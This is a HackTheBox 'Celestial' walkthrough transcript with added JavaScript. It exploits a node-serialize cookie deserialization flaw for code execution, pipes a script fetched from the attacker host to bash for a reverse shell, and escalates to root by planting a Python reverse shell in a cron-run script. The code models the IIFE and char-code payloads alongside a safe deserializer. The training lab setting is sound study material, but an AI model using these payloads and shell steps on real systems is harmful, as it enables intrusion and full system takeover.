HackTheBox - Celestial

IppSec · Intermediate · 🔧 Backend Engineering · 7y ago

Key Takeaways

The video demonstrates how to exploit a Node.js deserialization bug (the node-serialize library passing a flagged function string straight to eval) to achieve code execution, and then gain a root shell on a HackTheBox machine, using Burp Suite, Node.js, and Python. Code execution comes from a serialized object carrying an immediately invoked function expression (IIFE), or, as the video shows, a bare expression in place of the function; privilege escalation is a writable Python script that a root cron job runs every five minutes.

Full Transcript

What's going on, YouTube? This is IppSec, and we're doing Celestial from HackTheBox. First off, I want to apologize: the video will be a bit shorter and choppier than normal because, well, it's the change of a season, which means I have bad allergies. Hopefully next week I'll be back to normal and talking won't be as painful.

So, that being said, Celestial was a pretty good box. To get the user shell (I didn't like the privesc) you have to dig into deserialization attacks, and of all the languages, Node deserialization is the easiest to understand because it passes, usually it passes, the serialized object straight into eval. So we're digging into that, and if you've mastered Node serialization, I'd recommend looking into Python pickle, then PHP, and then Java with gadgets. The privesc was just a cron job: you find it, you edit a Python script, wait a few minutes, and then you get a root shell.

So let's jump in and run an nmap with -sC for default scripts, -sV to enumerate versions, -oA to output all formats, put this in a file called celestial, then the IP address, which is 10.10.10.85. It does take some time to run, so I've already run it. Looking at the results, we see only one port is open, that is port 3000. It's advertising itself as an HTTP web service, and it's saying it's the Node.js Express framework. Express is just a framework built upon Node.js, much like Django and Flask are related to Python, Rails to Ruby, Laravel and Cake to PHP. Express is just built upon Node.js, which is a web server built around JavaScript. So unlike the previously mentioned Django, Flask, Rails, whatever, this one just uses one programming language for both the front end and the back end, which makes it really easy to make web applications instead of web pages, because, well, the front-end developers can write back-end code, the back-end developers can write front-end code, and they can all join together and write crappy code as one.

So let's take a look at the web page. I'm going to 10.10.10.85, port 3000. We just get a 404 error. If we make this a valid URL and put a slash, we get "hey dummy 2+2 is 22". So we're going to do what we always do and run recon in the background as we go along: gobuster -h; we want to use the wordlist, /usr/share/wordlists/dirbuster/directory-list-2.3-medium, then, let's see, -u for URL, so 10.10.10.85:3000, and -o to specify the output file as gobuster.log. We may have to do http://, and "wordlist does not..." oh, -w for the wordlist, -o was the output file.

So looking at this page, let's just send it to Burp and see what Burp says about it. So turn intercept on, refresh the page... refresh... oh, use Burp Suite, I had the wrong thing checked. Go here, and we see it already assigned us a cookie. It is base64 encoded, so let's just quickly go to the Decoder tab, smart decode; it's going to decode the URL %3D to the equal signs, then we can say decode as base64. Decode as base64... I wonder what I did there, that was odd, but we get just a JSON object, and this is num equals 2. So if we put num equal to, let's do 100, then encode this as base64, then encode this again as URL, and then we can just paste this into the profile cookie and see what it says. So without editing it, "hey dummy 2+2 is 22", and with editing it, "100+100 is 100100". So it looks like they're just concatenating the number, putting it twice, and then that's what the answer is. The key thing to know is the web server is utilizing the cookie somehow, and it's going through some type of serialized object.

So I'm going to turn my intercept off, and we can go and Google for "node js serialize vulnerability" and see what shows up. "Exploiting Node.js deserialization bug for code execution" sounds like a winning bet. So looking over this, we see untrusted data passed into the unserialize() function can be exploited to achieve code execution by passing a serialized JavaScript object with an immediately invoked function expression (IIFE). This piece actually isn't needed, and we'll dig into the code to find out why. But going down, we do have a little bit of source code. So here's them building the payload: we're creating a serialized object in Node, or JavaScript, and then just printing it out to the output, and we can see this is what it looks like. It creates the RCE object, then does this _$$ND_FUNC$$_, then puts function and then creates the function.

So serialization is something that a lot of programming languages have vulnerabilities with. Node.js is going to be a little bit unique in how it does it, but all these are good readings to do: understanding PHP object, Java deserialization, Rails, Python with pickles; everything's been played with serialization exploits. And the purpose of serialization is for people to take any piece of code and convert it into a byte stream, which is essentially just text, and then be able to load it elsewhere. So with Node we're going to serialize a function, and looking through node-serialize we're going to see it just evals the function. When you pass code to eval, you can just execute code.

So let's take this exploit and run it real quick, or not the exploit but their payload, and make sure it works on our box. I'm just going to kill that gobuster because that isn't needed; it's just a good habit to always have background recon going in the background. So let's make a new directory called exploit-dev, and then we're going to do npm install node-serialize, I think that's the library they use. There we go, and you can make payload.js, set paste, paste their code in, and just do node payload, and we see it outputs the serialized object.

So what we want to do is go into the node_modules which npm had installed, go into node-serialize, and let's grep for exactly what ND_FUNC does and kind of trace this. So I'm just going to copy this; grep, hand was misplaced; grep -R for recursive, -i so it's case insensitive, ND_FUNC, and we'll start in our current working directory. We see lib/serialize.js utilizes this, so if we look at this we see it right at the top: ND_FUNC gets declared as FUNCFLAG. So let's just search for this, and actually I'm going to switch to vi for syntax highlighting. There's probably a key in less to do syntax highlighting, but I don't know that key off the top of my head. So the next thing is it's just putting output object equal to FUNCFLAG plus the function string, and then after that we see it grabbing the index of zero, so I'm guessing it did a split on FUNCFLAG, and the left-hand side is just FUNCFLAG and the right-hand side is the function string. And the next thing it does is, if we find that flag, send it over into eval, and when you eval code, again, that's code execution. You should never pass user input into eval, so that's why this method of deserialization leads to code execution. In Java you need to use gadgets, in PHP you need to do stuff with, I think, the __wakeup and __destruct calls, but Node is a bit unique in just passing stuff to eval, which is why I said front-end developers and back-end developers can come together and write bad code.

So knowing that, let's just go up a directory, up two directories, and change our payload. We know we get output over at username, so let's get rid of this, and we're going to take the line of code at RCE and place that there. So let's go back, put this all on a nice one line, dd, delete it, put it there, backspace, and that looks good. So if we run node payload we get an unexpected token; whoops, don't want that line. There we go, and we do see it doing a node-serialize function right here, so that looks all good. Copy this, go to Decoder, paste, copy, and do this little dance, paste it in the profile, and it doesn't look like we actually execute code. So let's go back in the Decoder and try getting rid of the quotes around the function and see if that does anything. Paste this in, click go; unexpected token. So we need that there. So we can go back and try that immediately invoked function expression. If we go back to the page, let's see, we add parentheses; looks like after this, guessing we can add it here maybe. Let's see what happens; it can't be too much. So we get "invalid username type", so the application detected, I guess, that we put a function where the username should go.

So let's get rid of the IIFE that I had said, and also get rid of function, and we also want to get rid of this bracket and the trailing bracket. So let's copy this and paste, and we get an unexpected token of a semicolon, so let's just remove that and see if it's happy. Then copy, too much, and here we go: we get "hey [object Object] 9001+9001 is 90019001". So we probably know we have code execution at this point, and if we want to we can copy this, because the font's bigger here if you were having trouble seeing this; call this payload.txt. All this does is, under username, it evals this code. So remember, if we go back to that node-serialize function, it just pretty much splits this into two things and says okay, if the very first part equals this, then eval this. And when what was eval'd was a function, I guess the program couldn't display the function and errored out; however, when what was eval'd was just a line of code, it ran this and returned an object, which then we see here. So we could try something like String(stdout), see what this does, if we want to try to print the results of this. I'm not sure if we're going to be able to see... still says object. Let's try JSON.stringify; it's an odd thing, but that's JavaScript-based, so I'm not sure exactly how to convert this into a string so it gets displayed. You'd probably write a few lines to do it, but we have code execution.

If we want to, we can further verify that; my favorite thing is just pinging us. So instead of ls let's do ping 10.10.14.13, I think that's my IP, and let's do -n... -n, I think that's the count. So tcpdump -i tun0 icmp, copy this, paste this, and it didn't ping us. ifconfig tun0: 10.10.14.13, that was correct. Check ping 10.10.14.13; -n is not... is it -c? -n is Windows probably, so let's do -c. Copy this, paste, and we get two pings. So we have code execution.

We could just now create a www directory and then go to our reverse shell cheat sheet. Let's copy this, and we'll do Python... now, we can try bash first, try this. So we can do shell.sh, and then 10.10.14.13 port 9001, start a web server and listen on port 9001. Go back to Decoder, and instead of a ping we want to do curl 10.10.14.13/shell.sh, copy this, paste it in, click go. Got it; we forgot to pipe it to bash, so pipe bash, so we execute whatever curl sees, click go, and we have a shell.

There's other things you could do, like msfvenom. We go back to the web server, we do msfvenom -l payload | grep node. We could use msfvenom, or like an open source tool, I think, let's see, nodejsshell is another one, to just have a Node shell instead of piping it to executing curl and doing a shell command; we could do it all within Node to get a shell, but I just do it this way. So you'd do msfvenom -p this, LHOST 10.10.14.13, LPORT 9001, and then this will output code that you copy and paste. And if you did it this way, because it outputs so much junk, take note of exactly what nodejsshell did and convert it to char codes and then do an eval(String.fromCharCode(...)), because you'll just avoid all the bad characters. Essentially it's just going to put a bunch of, I think, the octal values, and then it decodes it and then executes it. But I find just doing the curl the easiest way, because it translates between all the languages.

So with that, let's get into the actual privesc, which I didn't find that interesting. But let's copy /opt/LinEnum.sh, start a web server up again, then curl 10.10.14.13/LinEnum.sh and execute bash with it. Here we go. Now it's listening? That's odd. And it looks like it's pretty much finished, so let's go to the top of LinEnum and see what we see. So we have Ubuntu 16.04 Xenial, the hostname is sun, the current groups are in adm, sudo, and I think those are the interesting groups: adm can read log files, and sudo, maybe we just do sudo su. Keep going, see what else we see: some other admin users, passwd, nothing too interesting there, accounts. We see that ~/.sudo_as_admin_successful, so at one point this user was a member of sudoers, and I'm guessing this is just from when you do the install.

So let's go check that out real quick: sudo -l, no TTY present. So let's do python -c 'import pty; pty.spawn("/bin/bash")', and then Ctrl-Z, stty raw -echo, fg; now we've got a real shell. sudo -l, and what's the password? So we don't know the password for this. We could go look at /var/www/html, doesn't exist; ps -ef | grep node, so it's in /home/sun, and we can look at server.js, see if it has any passwords. Got the cookie, the default cookie it sets, but nothing there. So the next thing to do is look at the logs, so we go to /var/log, and again we can read these because we're adm. We can tail, let's just make this bigger, the last thousand lines of syslog and see what we have: a bunch of syntax errors, and we see a cron job running /home/sun/Documents/script.py in here. So let's see if we can execute this, and we see it's running as root. So cd /home/sun/Documents, ls -la script.py; we can write to the script. So then vi, and let's just do a reverse shell. So go back to a reverse shell cheat sheet, Python, and put this in, and we should change our IP address. So let's do 10... my shell was acting weird... 10.10.14.13, we'll change the port to be 9002. Okay, whoops, wrong one, and nc -lvnp 9002. Let's execute the script to make sure it works; we do get a connect, exit, and now we just wait for the five-minute mark. So it's got another four minutes until this script should run, and I think I didn't explain how I did that. So if we grep cron on syslog we see that's every, yeah, five minutes. I don't know why it ran here... oh, this is just the hourly cron, but we see 16:25, 16:30, 16:35, 16:40, so it looks like the script runs every five minutes. So I'm going to pause the video, and in about four minutes we should get a callback as root on this port.

And there we go, we got a shell. So if we do id, we are now root. We can go into /root and do wc -c root.txt, and we can read that. So that is the box.

Let's go back a little bit and do this the way probably most people did, and that's with the nodejsshell. I haven't actually done that, so this will be a little bit of a learning experience for me, but hey, that'll be fun. So let's go back into our exploit-dev, go into payload.js, and let's change this to be "please subscribe", and we can just do the RCE equal to code. Okay, let's go grab this, the shell.js, set paste, and change the IPs... oh, it takes a host and a port as arguments, sweet. So we just do node shell 10.10.14.13 9003; no, this is Python. Okay, so python shell... mv shell.js to shell.py; python shell 10.10.14.13 9003. So we have this eval(String.fromCharCode(...)), so let's go back into payload and paste this in, and let's go back to this page and see exactly how they want this function. So we could probably just do that node function thing, _$$ND_FUNC$$_, but let's do this the way the article says. So function, like that, that looks good; node payload. Okay, and we don't have that ND_FUNC, so we did something wrong. Go back here, let's see, did we not put that in quotes? There we go, that's why I was looking for this ND_FUNC. So if we copy this, go to Burp Decoder, paste it; I did not paste it; copy, paste, copy this. It's probably not going to work, because we didn't do that immediately invoked expression example I had said earlier. So let's just paste this in, and we don't need this wget anymore, so let's just do it here: nc -lvnp 9003, click go, and we get "hey please subscribe". If we go back to the Decoder tab, and we want to put, let's see, I want to say it was right here, I just put the parentheses at the very end. Let's see if this works, so nodejsshell, go, shell. So that's how most people did it, and we can remove that IIFE thing that I just mentioned, but first copy this into a place where you can more easily read it.

So all I did in that Decoder tab was go to the end and then add this, so it executes the function as soon as it sees it. We could also just, again, execute this as a straight eval, like that. We can test this; this should work as well. Paste that in, go back here, no shell, and hopefully we get a shell. And shell. So that's the way most people probably did the box. Again, I like putting it in here because you could expand upon that, extracting text, and do this if there was a strict firewall. And yeah, so hope you guys enjoyed the box. Take care, and I will see you all next week.
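The cookie flow and the node-serialize behaviour the transcript traces, as an added example that is not part of the video, the box's server.js, or the node-serialize source. It is a constructed model of what the video describes (a `_$$ND_FUNC$$_`-prefixed function string handed to eval during unserialize): the parentheses around the eval'd string, the stand-in greeting handler, the `dummy`/`num` profile, and the `celestialMarker` side effect that stands in for a shell command are assumptions. It shows why a serialized function without the IIFE is merely defined, why the IIFE or a bare expression runs at deserialization time, the `eval(String.fromCharCode(...))` wrapper mentioned for bad characters, and a deserializer that refuses flagged values instead of evaluating them.

```javascript
// Added example: a constructed model of the behaviour IppSec traces in
// node-serialize (functions stored as FUNCFLAG + source, then eval()'d on
// unserialize), the base64+URL cookie encoding seen in Burp, the two payload
// shapes used in the video, and a deserializer that refuses to eval.
// None of this is the box's server.js or the library's own source.

const FUNCFLAG = '_$$ND_FUNC$$_'; // the flag grep'd for in lib/serialize.js

// Model of serialize(): functions become FUNCFLAG + their source text.
function modelSerialize(obj) {
  return JSON.stringify(obj, (key, value) =>
    typeof value === 'function' ? FUNCFLAG + value.toString() : value);
}

// Model of the vulnerable unserialize(): a string that starts with FUNCFLAG is
// split off the flag and passed to eval(). The surrounding parentheses are an
// assumption about the library; with them "function(){..}" evaluates to a
// function value, "function(){..}()" runs immediately, and a bare expression
// evaluates to its result.
function modelUnserializeVulnerable(json) {
  return JSON.parse(json, (key, value) =>
    typeof value === 'string' && value.startsWith(FUNCFLAG)
      ? eval('(' + value.slice(FUNCFLAG.length) + ')')
      : value);
}

// Hardened replacement: plain JSON, and a flagged value is an error, not code.
function unserializeSafe(json) {
  return JSON.parse(json, (key, value) => {
    if (typeof value === 'string' && value.startsWith(FUNCFLAG)) {
      throw new Error('refusing to deserialize a function in ' + JSON.stringify(key));
    }
    return value;
  });
}

// The profile cookie as it appears in Burp: base64 of the JSON, then URL-encoded
// ("=" padding shows up as %3D, which Decoder's smart decode strips first).
function encodeProfileCookie(json) {
  return encodeURIComponent(Buffer.from(json, 'utf8').toString('base64'));
}
function decodeProfileCookie(cookie) {
  return Buffer.from(decodeURIComponent(cookie), 'base64').toString('utf8');
}

// Constructed stand-in for the page: num is a string in the cookie, so "+"
// concatenates and 2+2 comes out as 22 (100+100 as 100100 in the video).
function renderGreeting(profile) {
  return `hey ${profile.username} ${profile.num}+${profile.num} is ${profile.num + profile.num}`;
}

// Payload shape 1 (the blog post): a serialized function turned into an IIFE by
// the trailing "()" that was added at the very end in Decoder.
function iifePayload(jsBody) {
  return JSON.stringify({ username: FUNCFLAG + 'function(){' + jsBody + '}()', num: '2' });
}
// Payload shape 2 (the video's shortcut): no function at all, just an expression
// after the flag; eval() runs it and its value lands in username.
function bareExpressionPayload(jsExpression) {
  return JSON.stringify({ username: FUNCFLAG + jsExpression, num: '2' });
}
// The eval(String.fromCharCode(...)) wrapper mentioned for dodging bad characters.
function toCharCodeEval(code) {
  return 'eval(String.fromCharCode(' + Array.from(code, c => c.charCodeAt(0)).join(',') + '))';
}

// Walk the whole flow once and report what each payload does.
function runDemo() {
  globalThis.celestialMarker = 0; // side effect the payloads bump, standing in for a command
  const out = {};

  const benign = encodeProfileCookie(modelSerialize({ username: 'dummy', num: '2' }));
  out.greeting = renderGreeting(modelUnserializeVulnerable(decodeProfileCookie(benign)));

  // A serialized function without the IIFE is only defined by eval(), never run.
  const definedOnly = JSON.stringify({ username: FUNCFLAG + 'function(){ globalThis.celestialMarker += 1000 }' });
  out.withoutIifeType = typeof modelUnserializeVulnerable(definedOnly).username;

  const iife = encodeProfileCookie(iifePayload('globalThis.celestialMarker += 1; return "ran-iife"'));
  out.iife = modelUnserializeVulnerable(decodeProfileCookie(iife)).username;

  const bare = encodeProfileCookie(bareExpressionPayload('globalThis.celestialMarker += 10'));
  out.bare = modelUnserializeVulnerable(decodeProfileCookie(bare)).username;

  const wrapped = encodeProfileCookie(bareExpressionPayload(toCharCodeEval('globalThis.celestialMarker += 100')));
  out.charCode = modelUnserializeVulnerable(decodeProfileCookie(wrapped)).username;

  out.marker = globalThis.celestialMarker;

  // The safe deserializer turns the same IIFE cookie into an error instead of code.
  try { unserializeSafe(decodeProfileCookie(iife)); out.safeRejected = false; }
  catch (e) { out.safeRejected = true; }
  return out;
}

console.log(runDemo());
```

Run it with `node`. The bump of `celestialMarker` is where the video's `require('child_process').exec(...)` or `curl ... | bash` would sit; nothing about the deserializer changes between the benign cookie and the attack cookies, which is the point of the video's trace through lib/serialize.js: once a flagged string reaches eval, the only safe deserializer is one that never gets there.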

Original Description

00:58 - Begin of Recon
03:00 - Looking at the web application and finding the Serialized Cookie
04:38 - Googling for Node JS Deserialization Exploits
06:30 - Start of building our payload
07:10 - Examining Node-Serialize to see what the heck _$$ND_FUNC$$_ is
09:10 - Moving our serialized object to "Name", hoping to get to read stdout
11:30 - Really abusing the deserialize function by removing the Immediately Invoked Function Expression (IIFE)
13:25 - Failing to convert an object (stdout) to string.
14:02 - Verifying code execution via ping
15:32 - Code execution verified, gaining a shell (Get a shell via NodeJSShell at end of video)
18:49 - Reverse shell returned, running LinEnum.sh
21:26 - Examining logs to find the Cron Job running as root
22:09 - Privesc by placing a python root shell in script.py
24:15 - Going back and getting a shell with NodeJSShell

This video teaches how to exploit a Node.js deserialization bug (node-serialize evaluating a flagged function string with eval) to achieve code execution, and then how to gain a root shell on a HackTheBox machine through a root cron job that runs a writable Python script. The exploitation process uses a serialized object in the profile cookie carrying either an immediately invoked function expression (IIFE) or a bare expression after the function flag.

Key Takeaways
  1. Run recon (nmap, gobuster) in the background while examining the site
  2. Use Burp Suite to intercept the request and decode the URL-encoded, base64-encoded profile cookie
  3. Search for the Node.js deserialization exploit and note that it targets the node-serialize library
  4. Build a payload using Node.js and the node-serialize library, run it, and inspect the serialized output
  5. Grep node_modules for the `_$$ND_FUNC$$_` flag and trace how lib/serialize.js passes the flagged string to eval
  6. Exploit the deserialization bug to achieve code execution: first a blind ping to confirm, then `curl ... | bash` to get a reverse shell
  7. Find the root cron job running /home/sun/Documents/script.py by reading syslog (possible because the user is in the adm group)
  8. Edit script.py to hold a Python reverse shell and wait for the five-minute cron run to return a root shell
💡 The video highlights the importance of properly securing Node.js applications against deserialization vulnerabilities (never letting user-controlled input reach eval) and the potential consequences of failing to do so, including code execution and, combined with a weak cron job, root shell access.
